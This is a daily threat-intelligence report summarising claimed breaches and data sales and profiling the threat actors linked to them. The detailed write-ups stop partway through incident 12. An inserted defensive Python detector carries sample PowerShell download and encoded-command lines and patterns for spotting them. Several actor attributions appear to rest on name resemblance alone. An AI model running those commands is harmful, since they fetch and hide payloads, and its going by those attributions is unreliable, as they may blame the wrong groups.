[June-06-2025] Daily Cybersecurity Threat Report

I. Executive Summary

This report provides a concise overview of significant cybersecurity incidents observed in the last 24 hours, highlighting key threat actor activities, prevalent attack methodologies, and their broader implications. The current landscape is characterized by the continued dominance of financially motivated ransomware groups and persistent state-sponsored cyber espionage, increasingly augmented by artificial intelligence (AI) capabilities. A notable trend is the industrialization of cybercrime, where specialized actors facilitate complex attacks.

Analysis of recent events indicates that ransomware operations, particularly those employing double extortion tactics, remain a primary and highly impactful threat. Groups such as BlackMatter and BlackSuit are actively targeting high-value entities across various sectors. Concurrently, nation-state actors, predominantly from China, North Korea, and Iran, continue to engage in sophisticated cyber espionage campaigns. These campaigns focus on critical infrastructure, government agencies, and sensitive industries, aiming for intelligence collection and strategic disruption. A significant development observed is the rising influence of AI, which appears to lower the barrier to entry for sophisticated cyberattacks, enabling what some refer to as “zero-knowledge threat actors” and consequently increasing the volume and complexity of threats. Initial access for many of these attacks is frequently gained through highly tailored phishing campaigns and the exploitation of known vulnerabilities in public-facing systems. The cybercrime ecosystem is also exhibiting increased specialization, with Initial Access Brokers (IABs) playing a critical role in facilitating ransomware deployments by providing pre-compromised access to target networks.

II. Incident Overview

This section provides a high-level snapshot of the day’s cyber activity, summarizing all reported breaches, detailing the affected entities, primary threat actors, and initial impact.

Table: Summary of Recent Cybersecurity Incidents

Incident ID | Affected Entity | Primary Threat Actor | Attack Type | Initial Impact | Date Reported
1 | jkt48showroom.com | LIUSHEN (Leviathan) | Data Breach | User account database with plaintext passwords | 2025-06-06T12:54:45Z
2 | Dinas PU Bina Marga dan Tata Ruang (DPUBMBTR) of South Sumatra Province | ksotaria (Kimsuky) | Data Breach | Sensitive employee information | 2025-06-06T12:54:10Z
3 | Undisclosed (UK Credit Cards) | BlackMaster (BlackMatter) | Data Leak | 1K credit card records | 2025-06-06T12:49:35Z
4 | Undisclosed (Ethereum) | warrtemp13 | Malware | Sale of Python-based Ethereum poisoning bot | 2025-06-06T12:36:39Z
5 | Bolt | Wieko (Peoples Cyber Army) | Data Breach | Detailed driver information from 196 fleets | 2025-06-06T12:22:40Z
6 | Undisclosed (Crypto Platforms) | TheLibertyCity | Data Leak | 50K email:password pairs linked to crypto platforms | 2025-06-06T12:19:09Z
7 | Ministry of Labour and Social Security (MTSS) | Tacuara | Data Breach | 350,800 records of personal data | 2025-06-06T12:11:14Z
8 | Ministry of Finance Thailand | LongBigDick | Initial Access | Sale of access to data management system | 2025-06-06T11:58:23Z
9 | Kasikorn Bank | NDT SEC | Alert | Claim to target Kasikorn Bank | 2025-06-06T11:43:50Z
10 | Daerah Istimewa Yogyakarta (Government Health) | Panda (Aquatic Panda) | Data Breach | Over 2.5 million maternal and public health records | 2025-06-06T10:46:34Z
11 | Undisclosed (Chinese Corporate Employees) | Panda (Aquatic Panda) | Data Leak | 10,923 records of Chinese corporate employees | 2025-06-06T10:30:16Z
12 | Undisclosed (Kraken.com) | Kaught | Malware | Sale of Kraken.com email checker tool | 2025-06-06T09:17:02Z
13 | Unknown Source | Саша (Alexander Vinnik) | Data Leak | Sale of live.json files (posts, comments, albums, photos) | 2025-06-06T09:15:55Z
14 | Undisclosed (U.S. Cloud Services) | black18 (BlackSuit) | Initial Access | Sale of Magento-based admin panel access | 2025-06-06T08:40:30Z
15 | Directory of Government in China | DigitalGhost (Ghost) | Data Breach | Government leadership profiles, department structures, contact details, laws, policies, economic statistics | 2025-06-06T06:54:23Z
16 | EMPIRE777 | DigitalGhost (Ghost) | Data Breach | Personal data of individuals (PII) from Thailand, Vietnam, Malaysia | 2025-06-06T06:07:03Z
17 | Jakarta Public Library | KEDIRISECTEAM | Data Breach | 609,881 user records (Member ID, Name, Email, Phone, PII) | 2025-06-06T05:43:09Z
18 | Ministry of Health of Peru | Kitten_FBI_Nz (Fox Kitten) | Data Breach | Documents targeting women for family planning/pregnancy services | 2025-06-06T05:39:45Z
19 | Undisclosed (WordPress Sites) | get_com | Data Leak | 19,000 vulnerable WordPress sites with WooCommerce plugin | 2025-06-06T05:18:47Z
20 | Bank of America | chuu (UNC3569) | Data Breach | 3.5 million customer records (user IDs, names, balances, CVV, expiry) | 2025-06-06T05:02:20Z
21 | Directorate General of Forestry Law Enforcement | LikeEx01 (ToyMaker) | Data Breach | Database from db_perpusgakkum (21 user records) | 2025-06-06T04:47:19Z
22 | Fling | Sworz | Data Breach | 13.7 GB of data, 40 million users | 2025-06-06T04:38:08Z
23 | HBOMAX | DigitalGhost (Ghost) | Data Breach | Personal email addresses and plaintext passwords | 2025-06-06T04:00:04Z
24 | Undisclosed (Credit Cards) | Chap | Data Leak | Over 100,000 credit card records | 2025-06-06T03:09:20Z
25 | Sagar Marketing | gesss | Initial Access | Admin panel access to sagarmarketing.in | 2025-06-06T02:38:26Z
26 | The National Digital System | DigitalGhost (Ghost) | Data Leak | Detailed personal and family information of Israeli President Isaac Herzog | 2025-06-06T02:32:03Z

III. Detailed Incident Analysis

This section provides an in-depth examination of each significant cybersecurity incident, offering context, technical details, and a comprehensive profile of the associated threat actor(s).

Incident 1: Alleged Sale of JKT48Showroom.com User Account Database

  • Date & Time of Breach: 2025-06-06T12:54:45Z
  • Incident Summary & Initial Impact: The threat actor claims to be selling a user account database allegedly sourced from jkt48showroom.com, a fan-operated platform aggregating livestream data of JKT48 idols. The leaked dataset reportedly includes account IDs and plaintext passwords, suggesting a serious compromise of user credentials.
  • Affected Entity Context: JKT48Showroom.com is a fan-operated platform that aggregates livestream data of JKT48 idols. The JKT48 Showroom Fanmade app, which is distinct from the website itself, states that it does not collect or share user data.1 The victim industry is Entertainment & Movie Production, and the victim country is Indonesia.
  • Associated Threat Actor Profile:
  • Name/Alias(es): LIUSHEN, also known as Leviathan, APT40, Kryptonite Panda, TEMP.Periscope, TEMP.Jumper, Bronze Mohawk, Mudcarp, Gadolinium, ATK 29, ITG09, TA423, Red Ladon, Gingham Typhoon, and ISLANDDREAMS.2
  • Country of Origin/Affiliation: Chinese-sponsored cyberespionage group.2
  • Motivations: Espionage, targeting governmental organizations, companies, and universities across various industries, including biomedical, robotics, and maritime research.2
  • Observed Tactics, Techniques, and Procedures (TTPs) specific to this incident: The threat actor is selling a user account database containing plaintext passwords. This aligns with Leviathan’s broader objective of data exfiltration and intelligence collection.2
  • General TTPs and Notable Past Activities of the Actor: Leviathan frequently uses phishing emails with malicious attachments (often JavaScript or macro-enabled Office documents) or links to Google Drive to deploy malware like Cobalt Strike. They exploit vulnerabilities in public-facing infrastructure (e.g., Log4J, Atlassian Confluence, Microsoft Exchange) and conduct strategic web compromises through fake websites. For persistence and data exfiltration, they utilize custom backdoors such as AIRBREAK, BADFLICK, and HOMEFRY, and employ legitimate platforms like GitHub (using steganography) and Dropbox (impersonating API keys) for C2 communications and data staging. They also use protocol tunneling and multi-hop proxies like Tor to obscure their tracks.2
  • Technical Context & Attack Chain: The incident involves the alleged sale of a user account database with plaintext passwords, indicating a direct compromise of user credentials from the jkt48showroom.com platform. The specific method of initial access for this incident is not detailed, but it aligns with Leviathan’s known TTPs of exploiting vulnerabilities or using phishing to gain access to sensitive data.
  • References:
  • Published URL: https://darkforums.st/Thread-USER-ACCOUNT-jkt48showroom-com
  • Screenshots: https://d34iuop8pidsy8.cloudfront.net/a9eac07e-a1bb-4ebe-bfe6-8bb659d4ed45.PNG

Incident 2: Alleged Database Leak of Dinas PU Bina Marga dan Tata Ruang (DPUBMBTR) of South Sumatra Province, Indonesia

  • Date & Time of Breach: 2025-06-06T12:54:10Z
  • Incident Summary & Initial Impact: The threat actor claims to have leaked the database of Dinas PU Bina Marga dan Tata Ruang (DPUBMBTR) of South Sumatra Province, Indonesia. The exposed dataset reportedly includes sensitive employee information such as NIP (civil servant ID), full names, usernames, gubernatorial decrees (SK GUBERNUR), access tokens, PSIP data, and incoming letters (SURAT MASUK).
  • Affected Entity Context: Dinas PU Bina Marga dan Tata Ruang (DPUBMBTR) of South Sumatra Province is a key government agency in Indonesia responsible for public works, road infrastructure, and spatial planning. A compromise of this entity could disrupt essential public services and critical infrastructure projects.3 The victim industry is Government & Public Sector, and the victim country is Indonesia.
  • Associated Threat Actor Profile:
  • Name/Alias(es): ksotaria, also known as Kimsuky.4
  • Country of Origin/Affiliation: North Korean Advanced Persistent Threat (APT) group.4
  • Motivations: Cyberespionage, primarily targeting South Korean businesses, government entities, and cryptocurrency users.4
  • Observed Tactics, Techniques, and Procedures (TTPs) specific to this incident: The incident involves the alleged leak of a government database containing sensitive employee information. This aligns with Kimsuky’s objective of data exfiltration for intelligence gathering.4
  • General TTPs and Notable Past Activities of the Actor: Kimsuky typically initiates attacks with phishing campaigns using .lnk files disguised as legitimate documents (e.g., work logs, insurance documents) with Korean lures. They heavily rely on PowerShell scripts for payload delivery, reconnaissance (gathering detailed system information), and execution of next-stage malware. Persistence is often achieved through scheduled tasks, such as “ChromeUpdateTaskMachine.” A key tactic is their use of Dropbox as a primary hosting platform for payloads and for exfiltrating collected system information, leveraging Dropbox’s trusted reputation to bypass conventional security defenses.4
  • Technical Context & Attack Chain: The alleged database leak suggests unauthorized access to the DPUBMBTR’s systems. While the specific attack chain for this incident is not detailed, it is consistent with Kimsuky’s known methods of gaining initial access through phishing and then performing reconnaissance and data exfiltration. The presence of “access tokens” in the leaked data suggests a potential compromise of authentication mechanisms.
  • References:
  • Published URL: https://darkforums.st/Thread-LEAKED-DPUBMBTR-SUMATRA-SELATAN
  • Screenshots: https://d34iuop8pidsy8.cloudfront.net/bc945fc3-1d43-4f82-a446-8b7058284361.PNG
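The Kimsuky persistence pattern described above (a scheduled task named “ChromeUpdateTaskMachine” whose action launches PowerShell, with Dropbox used for payload hosting) can be turned into a scoring rule over Windows Security Event 4698 (scheduled task created) records. The block below is an added detection example, not part of this report or any vendor product; the event dictionaries and their field names are constructed for illustration, and the weights and threshold are assumptions to tune against your own telemetry.

```python
import re
from dataclasses import dataclass, field

# Constructed sample of Security Event 4698 records flattened to dicts.
# Field names (host, user, task_name, command, arguments) are an assumption
# about how your SIEM normalises the event XML; none of this is real telemetry.
SAMPLE_EVENTS = [
    {"event_id": 4698, "host": "WS-01", "user": "CORP\\alice",
     "task_name": "\\ChromeUpdateTaskMachine",
     "command": "C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe",
     "arguments": "-w hidden -ep bypass -enc QQBCAEMA"},          # placeholder base64
    {"event_id": 4698, "host": "WS-02", "user": "CORP\\bob",
     "task_name": "\\Microsoft\\Windows\\Defrag\\ScheduledDefrag",
     "command": "%windir%\\system32\\defrag.exe", "arguments": "-c -h -o -$"},
    {"event_id": 4698, "host": "WS-03", "user": "CORP\\carol",
     "task_name": "\\SyncDocs",
     "command": "powershell.exe",
     "arguments": "-NoP -c \"iwr https://www.dropbox.com/s/abc123/update.txt?dl=1 "
                  "-OutFile $env:TEMP\\u.ps1\""},                 # constructed URL
]

# Task name cited in the report as a Kimsuky persistence artefact.
KNOWN_PERSISTENCE_TASK = "chromeupdatetaskmachine"

# Any single rule is weak evidence; the combination is what matters.
ALERT_THRESHOLD = 6


def _basename(task_path: str) -> str:
    """Strip the task folder path (\\Microsoft\\Windows\\...) and keep the task name."""
    return task_path.rsplit("\\", 1)[-1]


# (rule name, predicate over one event, weight)
RULES = [
    ("named_persistence_task",
     lambda e: _basename(e["task_name"]).lower() == KNOWN_PERSISTENCE_TASK, 10),
    ("powershell_action",
     lambda e: re.search(r"(^|\\)powershell(\.exe)?$", e["command"], re.I), 3),
    ("hidden_window",
     lambda e: re.search(r"-w(indowstyle)?\s+hidden", e["arguments"], re.I), 3),
    ("encoded_command",
     lambda e: re.search(r"-e(?:c|nc|ncodedcommand)?\s+[A-Za-z0-9+/=]{8,}",
                         e["arguments"], re.I), 4),
    ("exec_policy_bypass",
     lambda e: re.search(r"-e(?:xecutionpolicy|p)\s+bypass", e["arguments"], re.I), 3),
    ("download_cradle",
     lambda e: re.search(r"\b(iwr|invoke-webrequest|downloadstring|downloadfile|iex)\b",
                         e["arguments"], re.I), 3),
    # Trusted-cloud staging: the report notes Dropbox as Kimsuky's payload host.
    ("dropbox_staging",
     lambda e: "dropbox.com" in e["arguments"].lower(), 4),
]


@dataclass
class Finding:
    host: str
    task_name: str
    score: int
    matched: list = field(default_factory=list)


def evaluate(event: dict):
    """Score one 4698 event; return a Finding if it crosses the alert threshold."""
    if event.get("event_id") != 4698:
        return None
    matched = [name for name, pred, _ in RULES if pred(event)]
    score = sum(weight for name, _, weight in RULES if name in matched)
    if score < ALERT_THRESHOLD:
        return None
    return Finding(event["host"], event["task_name"], score, matched)


def scan(events) -> list:
    """Run every event through evaluate() and keep only the alerts."""
    return [f for f in (evaluate(e) for e in events) if f is not None]


if __name__ == "__main__":
    for finding in scan(SAMPLE_EVENTS):
        print(f"{finding.host}: {finding.task_name} score={finding.score} "
              f"rules={','.join(finding.matched)}")
```

The benign defrag task scores zero, the named task with a hidden, encoded PowerShell action scores well above threshold, and a differently named task is still caught on the PowerShell download cradle plus Dropbox staging alone.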

Incident 3: Alleged sale of credit card data from UK

  • Date & Time of Breach: 2025-06-06T12:49:35Z
  • Incident Summary & Initial Impact: A threat actor is offering to sell 1K credit card (CC) records from the United Kingdom.
  • Affected Entity Context: The victim country is the UK, but no specific victim industry or organization is identified.
  • Associated Threat Actor Profile:
  • Name/Alias(es): BlackMaster, also known as BlackMatter, a possible rebrand of DarkSide.5
  • Country of Origin/Affiliation: Ransomware-as-a-service (RaaS) group; it appears to target organizations in English-speaking countries such as Australia, Canada, the United Kingdom, and the United States.6
  • Motivations: Financial gain through ransomware attacks, explicitly targeting businesses with more than $100 million in annual revenues.6
  • Observed Tactics, Techniques, and Procedures (TTPs) specific to this incident: The threat actor is selling credit card records. While BlackMatter is primarily a ransomware group, they are known to exfiltrate data for extortion purposes.5 The sale of stolen data, including financial information, is a common monetization strategy for financially motivated actors.
  • General TTPs and Notable Past Activities of the Actor: BlackMatter primarily gains initial access through the compromise of vulnerable edge devices (e.g., remote desktop, virtualization, and VPN appliances) or by abusing corporate credentials obtained from third-party leaks or dark web marketplaces. They leverage credential reuse and the absence of multi-factor authentication. Their payload is a highly efficient C-based executable that encrypts files using a combination of Salsa20 and 1024-bit RSA keys. BlackMatter enumerates Active Directory environments, changes desktop wallpaper to display ransom notes, and can execute in Windows ‘safe-mode’ to evade detection. A critical tactic is their wiping or reformatting of backup data stores and appliances rather than encrypting them, which significantly complicates recovery efforts. Communication with their command-and-control (C2) infrastructure occurs over HTTPS, often impersonating common user-agent strings.5
  • Technical Context & Attack Chain: The incident involves the alleged sale of credit card data. The specific method of data acquisition is not detailed, but it aligns with BlackMatter’s known methods of initial access and data exfiltration, which could then be sold on underground forums.
  • References:
  • Published URL: https://forum.exploit.in/topic/260405/?tab=comments#comment-1571918
  • Screenshots: https://d34iuop8pidsy8.cloudfront.net/153b243d-83cf-4336-ab8f-da651b1bd4a5.png

Incident 4: Alleged sale of ETH poisoning bot

  • Date & Time of Breach: 2025-06-06T12:36:39Z
  • Incident Summary & Initial Impact: A threat actor is selling a Python-based Ethereum poisoning bot. The bot automates target identification using smart analysis and executes poisoning via micro ETH transfers or 0-token transfers.
  • Affected Entity Context: No specific victim country, industry, or organization is identified. The incident relates to the sale of a malicious tool targeting Ethereum cryptocurrency.
  • Associated Threat Actor Profile:
  • Name/Alias(es): warrtemp13. No specific threat actor profile for “warrtemp13” is available in the provided research notes.
  • Country of Origin/Affiliation: Not specified.
  • Motivations: Financial gain, as the actor is selling a tool designed for illicit financial activities.7
  • Observed Tactics, Techniques, and Procedures (TTPs) specific to this incident: The actor is selling a Python-based Ethereum poisoning bot. This indicates a focus on developing and monetizing specialized malware for cryptocurrency theft.
  • General TTPs and Notable Past Activities of the Actor: As a general cybercriminal, motivations typically include financial gain through activities like stealing sensitive information, conducting ransomware attacks, or engaging in fraud. Their attack arsenal often includes phishing attacks, ransomware, malware, and social engineering.7 Underground hacker forums like Exploit.in are known marketplaces for such tools.8
  • Technical Context & Attack Chain: The incident involves the sale of a malware tool. The bot automates target identification and executes “poisoning” via micro ETH or 0-token transfers, suggesting a sophisticated method to trick users into sending cryptocurrency to attacker-controlled addresses.
  • References:
  • Published URL: https://forum.exploit.in/topic/260403/?tab=comments#comment-1571915
  • Screenshots: https://d34iuop8pidsy8.cloudfront.net/2edfdf93-7e29-44fb-ab05-d6fa83890a7e.png

Incident 5: Alleged database sale of Bolt

  • Date & Time of Breach: 2025-06-06T12:22:40Z
  • Incident Summary & Initial Impact: The threat actor claims to be selling the database of Bolt. The dataset reportedly includes detailed driver information from 196 fleets, such as driver names, emails, phone numbers, status (e.g., active/blocked), performance metrics (e.g., driver score, acceptance rate, trip statistics), and unique identifiers. The data is shared in CSV format and is being marketed for threat intelligence, fraud, or competitive analysis purposes.
  • Affected Entity Context: Bolt is an Estonian multinational mobility company offering ride-hailing, micromobility rental, food and grocery delivery, and carsharing services. It is headquartered in Tallinn and operates in over 600 cities in more than 50 countries.9 The victim industry is Transportation & Logistics, and the victim country is Estonia.
  • Associated Threat Actor Profile:
  • Name/Alias(es): Wieko, also known as Peoples Cyber Army (PCA) or Cyber Army of Russia Reborn.10
  • Country of Origin/Affiliation: Pro-Russian hacktivist group.10
  • Motivations: Political/ideological, supporting Russia’s stance on the Russian-Ukrainian conflict, undermining credibility of government institutions, disrupting critical services, and spreading pro-Russian propaganda.10
  • Observed Tactics, Techniques, and Procedures (TTPs) specific to this incident: The threat actor is selling a database containing detailed driver information. Data breaches are explicitly mentioned as one of PCA’s employed techniques.10
  • General TTPs and Notable Past Activities of the Actor: PCA’s primary methods include large-scale Distributed Denial of Service (DDoS) attacks using botnets to overwhelm network bandwidth and website defacement campaigns to spread pro-Russian propaganda. They also engage in data breaches and exploit vulnerabilities in internet-facing applications to gain initial access and escalate privileges. The group collaborates with other pro-Russian hacktivist groups like HackNeT and NoName057(16) to expand their operational reach and impact.10
  • Technical Context & Attack Chain: The incident involves the alleged sale of a database from Bolt, containing sensitive driver information. This suggests a successful data breach. While the specific method of initial access is not detailed for this incident, it aligns with PCA’s known TTPs of exploiting public-facing applications or other vulnerabilities to gain access and exfiltrate data.
  • References:
  • Published URL: https://darkforums.st/Thread-Bolt-Databreach-May-2025
  • Screenshots: https://d34iuop8pidsy8.cloudfront.net/f3bb4eb2-d281-4d36-89c4-958b5335705e.PNG

Incident 6: Alleged Sale of 50K Crypto Credentials

  • Date & Time of Breach: 2025-06-06T12:19:09Z
  • Incident Summary & Initial Impact: A threat actor claims to be selling a dump containing 50,000 email:password pairs linked to crypto platforms. The dataset reportedly includes accounts involved in trading activity.
  • Affected Entity Context: No specific victim country, industry, or organization is identified. The incident involves credentials for crypto platforms.
  • Associated Threat Actor Profile:
  • Name/Alias(es): TheLibertyCity. No specific threat actor profile for “TheLibertyCity” is available in the provided research notes. The term “Liberty City” appears in contexts related to video games or geographical locations, not cybercrime groups.11
  • Country of Origin/Affiliation: Not specified.
  • Motivations: Financial gain, as the actor is selling credentials for crypto platforms, likely for further fraudulent activities or account takeover.7
  • Observed Tactics, Techniques, and Procedures (TTPs) specific to this incident: The actor is selling a dump of 50,000 email:password pairs. This indicates a successful credential theft operation.
  • General TTPs and Notable Past Activities of the Actor: Financially motivated cybercriminals commonly steal sensitive information like credit card data and personal information for sale on black markets. Their attack arsenal often includes phishing attacks, ransomware, malware, and social engineering.17
  • Technical Context & Attack Chain: The incident involves the alleged sale of a large dataset of crypto credentials. The method of compromise is not specified, but it likely involves phishing, infostealer malware, or exploitation of vulnerabilities on crypto platforms to obtain these credentials.
  • References:
  • Published URL: https://forum.exploit.in/topic/260399/?tab=comments#comment-1571904
  • Screenshots: https://d34iuop8pidsy8.cloudfront.net/64176be6-c3c9-4799-a918-977a07b8fa90.png

Incident 7: Alleged database sale of Ministry of Labour and Social Security (MTSS)

  • Date & Time of Breach: 2025-06-06T12:11:14Z
  • Incident Summary & Initial Impact: The threat actor claims to be selling the database of Ministry of Labour and Social Security (MTSS). The dataset reportedly contains 350,800 records, including personal data such as names, national ID numbers, email addresses, phone numbers, birthdates, physical locations, and facial photos.
  • Affected Entity Context: The Ministry of Labour and Social Security (MTSS) in Uruguay is a government administration responsible for monitoring labor laws, ensuring compliance, issuing penalties, and providing legal protection for workers. It also plays a role in child labor issues.18 The victim industry is Government Administration, and the victim country is Uruguay.
  • Associated Threat Actor Profile:
  • Name/Alias(es): Tacuara. No specific threat actor profile for “Tacuara” as a cybercrime group is available in the provided research notes. The term “Tacuara” appears in a book title related to history.19 A Russia-aligned hacking group named TAG-110 is mentioned in relation to espionage campaigns, but no direct link to “Tacuara”.20
  • Country of Origin/Affiliation: Not specified.
  • Motivations: Financial gain, as the actor is selling a government database containing sensitive personal data.7
  • Observed Tactics, Techniques, and Procedures (TTPs) specific to this incident: The actor is selling a database with 350,800 records of personal data. This indicates a successful data breach and exfiltration.
  • General TTPs and Notable Past Activities of the Actor: Financially motivated cybercriminals commonly steal sensitive information for sale on black markets. Their attack arsenal often includes phishing attacks, ransomware, malware, and social engineering.17
  • Technical Context & Attack Chain: The incident involves the alleged sale of a large government database. The specific method of compromise is not detailed, but it suggests unauthorized access to the MTSS systems and subsequent data exfiltration.
  • References:
  • Published URL: https://darkforums.st/Thread-Selling-350800-db-api-mtss-gub-uy
  • Screenshots: https://d34iuop8pidsy8.cloudfront.net/bd61f926-2bb5-46a1-9e1f-17b0f3fdd0db.PNG

Incident 8: Alleged sale of unauthorized access to Ministry of Finance, Thailand

  • Date & Time of Breach: 2025-06-06T11:58:23Z
  • Incident Summary & Initial Impact: The threat actor claims to be selling access to the Ministry of Finance Thailand’s data management system.
  • Affected Entity Context: The Ministry of Finance Thailand oversees various matters concerning public finance, taxation, treasury, government property, and operations of government monopolies. It also provides loan guarantees for government agencies and state enterprises.21 The victim industry is Government Administration, and the victim country is Thailand.
  • Associated Threat Actor Profile:
  • Name/Alias(es): LongBigDick. No specific threat actor profile for “LongBigDick” is available in the provided research notes. The term appears in a song lyric related to hacking.22
  • Country of Origin/Affiliation: Not specified.
  • Motivations: Financial gain, as the actor is selling unauthorized access to a government system.7
  • Observed Tactics, Techniques, and Procedures (TTPs) specific to this incident: The actor is selling access to a data management system, indicating a successful initial access operation. This aligns with the activities of Initial Access Brokers (IABs) who specialize in acquiring and selling access to high-value organizations.24
  • General TTPs and Notable Past Activities of the Actor: Financially motivated cybercriminals commonly seek to gain and sell unauthorized access to systems. Their attack arsenal often includes phishing, exploitation of vulnerabilities, and other methods to achieve initial access.17
  • Technical Context & Attack Chain: The incident involves the alleged sale of access to a government data management system. This suggests a successful compromise of the Ministry of Finance Thailand’s network, likely through exploiting a vulnerability or compromised credentials to gain an initial foothold.
  • References:
  • Published URL: https://ramp4u.io/threads/ministry-of-finance-thailand-api-ftp-mysql.3174/
  • Screenshots: https://d34iuop8pidsy8.cloudfront.net/d12ec87f-e6ef-47cf-8d2c-10be531f5cd9.png

Incident 9: NDT SEC claims to target Kasikorn Bank

  • Date & Time of Breach: 2025-06-06T11:43:50Z
  • Incident Summary & Initial Impact: A recent post by the group claims that they are targeting Kasikorn Bank.
  • Affected Entity Context: Kasikorn Bank is a major Thai bank established in 1945, offering a wide range of financial products and services. It operates numerous branches across Thailand and has overseas offices.26
  • Associated Threat Actor Profile:
  • Name/Alias(es): NDT SEC.
  • Country of Origin/Affiliation: Hacktivist group, known for targeting Thailand’s infrastructure.27
  • Motivations: Geopolitical and cultural disputes, such as ongoing Thai claims on Angkor Wat, cultural reasons (some reportedly assert that Thailand is “mimicking” their culture), and Thailand’s stance on the Israel-Gaza conflict.27
  • Observed Tactics, Techniques, and Procedures (TTPs) specific to this incident: The group publicly claimed to be targeting Kasikorn Bank, indicating an intent to disrupt or compromise the financial institution. This aligns with hacktivist motivations to make political statements or cause disruption.27
  • General TTPs and Notable Past Activities of the Actor: NDT SEC is known for data leaks and launching Distributed Denial of Service (DDoS) attacks, which cause server disruptions. They have been observed collaborating with other hacktivist groups, including “Anonymous Cambodia”.27
  • Technical Context & Attack Chain: This incident is an alert about a claimed targeting rather than a confirmed breach. The threat actor’s public claim on Telegram indicates a potential intent to launch cyberattacks against Kasikorn Bank, consistent with hacktivist methods of publicizing their targets and motivations.
  • References:
  • Published URL: https://t.me/we_anon_ndtsec/90
  • Screenshots: https://d34iuop8pidsy8.cloudfront.net/da47a879-d426-498a-bd59-d88bf59ced40.png

Incident 10: Alleged Data Sale of Indonesian Government Health Records

  • Date & Time of Breach: 2025-06-06T10:46:34Z
  • Incident Summary & Initial Impact: The threat actor claims to be selling a government health database allegedly containing over 2.5 million records from Yogyakarta, Indonesia. The dataset reportedly includes maternal profiles, public health staff information, patient bias tracking, and system user data, with entries dating through mid-2025. The records are structured in multiple CSV files and include sensitive personal identifiers such as names, national IDs, phone numbers, and medical details.
  • Affected Entity Context: Daerah Istimewa Yogyakarta (Yogyakarta Special Province) has various health service facilities, including Puskesmas (public health centers) and hospitals, providing basic and referral health services.30 The victim industry is Hospital & Health Care, and the victim country is Indonesia.
  • Associated Threat Actor Profile:
  • Name/Alias(es): Panda, also known as Aquatic Panda, Bronze University, Charcoal Typhoon, Earth Lusca, and RedHotel. Tracked as FishMonger by ESET.31
  • Country of Origin/Affiliation: China-linked APT group, operates under the Winnti Group umbrella, overseen by Chinese contractor i-Soon.31
  • Motivations: Cyber espionage.31
  • Observed Tactics, Techniques, and Procedures (TTPs) specific to this incident: The threat actor is selling a government health database containing over 2.5 million sensitive records. This aligns with Aquatic Panda’s cyber espionage objectives, which include collecting sensitive information from government entities.31
  • General TTPs and Notable Past Activities of the Actor: Aquatic Panda’s campaigns involve the deployment of various malware families, including ScatterBee (a loader), ShadowPad and Spyder (implants common to China-aligned actors), SodaMaster (an implant also used by APT10), and RPipeCommander (a C++ reverse shell). The group is known for reusing established implants and has targeted governments, Catholic charities, non-governmental organizations (NGOs), and think tanks across Taiwan, Hungary, Turkey, Thailand, France, and the United States.31
  • Technical Context & Attack Chain: The incident involves the alleged sale of a large government health database, indicating a successful data breach and exfiltration. While the exact initial access vector for this campaign is not known, it is consistent with Aquatic Panda’s methods of targeting government entities for intelligence collection.
  • References:
  • Published URL: https://darkforums.st/Thread-Selling-BIG-BREACH-IndonesiaGovHealth-2025-%E2%80%93-2-5M-Maternal-Public-Health-Records-Exposed
  • Screenshots: https://d34iuop8pidsy8.cloudfront.net/4d8b17d2-9296-416b-8302-be2f799d3459.PNG

Incident 11: Alleged Database Sale of Chinese Corporate Employees

  • Date & Time of Breach: 2025-06-06T10:30:16Z
  • Incident Summary & Initial Impact: The threat actor claims to be selling a database of Chinese corporate employees, comprising 10,923 records allegedly sourced from internal HR systems and organizational charts of various Chinese companies. The dataset reportedly includes full names, mobile numbers, national ID numbers, company names, departments, and job titles. The records are formatted as a CSV file and are being marketed for use in recruitment, B2B outreach, or OSINT purposes.
  • Affected Entity Context: The victim country is China, but no specific victim industry or organization is identified beyond “Chinese corporate employees.”
  • Associated Threat Actor Profile:
  • Name/Alias(es): Panda, also known as Aquatic Panda, Bronze University, Charcoal Typhoon, Earth Lusca, and RedHotel. Tracked as FishMonger by ESET.31
  • Country of Origin/Affiliation: China-linked APT group, operates under the Winnti Group umbrella, overseen by Chinese contractor i-Soon.31
  • Motivations: Cyber espionage.31
  • Observed Tactics, Techniques, and Procedures (TTPs) specific to this incident: The threat actor is selling a database of Chinese corporate employees, including sensitive personal and professional details. This aligns with Aquatic Panda’s cyber espionage objectives, which include collecting industrial intelligence.31
  • General TTPs and Notable Past Activities of the Actor: Aquatic Panda’s campaigns involve the deployment of various malware families, including ScatterBee (a loader), ShadowPad and Spyder (implants common to China-aligned actors), SodaMaster (an implant also used by APT10), and RPipeCommander (a C++ reverse shell). The group is known for reusing established implants and has targeted governments, Catholic charities, non-governmental organizations (NGOs), and think tanks across Taiwan, Hungary, Turkey, Thailand, France, and the United States.31
  • Technical Context & Attack Chain: The incident involves the alleged sale of a database of corporate employee information, suggesting a successful data breach from internal HR systems or organizational charts. This is consistent with Aquatic Panda’s focus on intelligence collection.
  • References:
  • Published URL: https://darkforums.st/Thread-Selling-ChinaCorpEmployees-2025-%E2%80%93-10-923-records-Full-Company-Employee-Directory
  • Screenshots: https://d34iuop8pidsy8.cloudfront.net/1ae49533-7c1b-475d-9b3c-b7bf14889ee0.PNG

Incident 12: Alleged Sale of Kraken Email Checker

  • Date & Time of Breach: 2025-06-06T09:17:02Z
  • Incident Summary & Initial Impact: The threat actor claims to be selling a high-speed Kraken.com email checker tool designed to extract active accounts from large email databases. According to the actor, the tool boasts 80% accuracy, supports processing over 500,000 emails, and uses anti-ban techniques to avoid detection.
  • Affected Entity Context: No specific victim country, industry, or organization is identified. The incident relates to the sale of a malicious tool targeting email accounts, potentially for credential stuffing or other fraudulent activities.
  • Associated Threat Actor Profile:
  • Name/Alias(es): Kaught. No specific threat actor profile for “Kaught” is available in the provided research notes. The term appears in contexts related to law enforcement actions against cybercrime or general threat actor definitions.32
  • Country of Origin/Affiliation: Not specified.
  • Motivations: Financial gain, as the actor is selling a tool designed to facilitate the extraction of active email accounts, likely for illicit purposes.7
  • Observed Tactics, Techniques, and Procedures (TTPs) specific to this incident: The actor is selling an email checker tool, indicating a focus on developing and monetizing tools for credential harvesting or account validation.
  • General TTPs and Notable Past Activities of the Actor: Financially motivated cybercriminals commonly sell hacking tools and services on dark web forums like BreachForums and Exploit.in.36 Their attack arsenal often includes phishing attacks, ransomware, malware, and social engineering.7
  • Technical Context & Attack Chain: The incident involves the sale of a specialized tool designed for mass email account validation. This tool’s capabilities (high accuracy, processing large volumes, anti-ban techniques) suggest a sophisticated approach to automating illicit activities, likely for credential stuffing or spamming campaigns.
  • References:
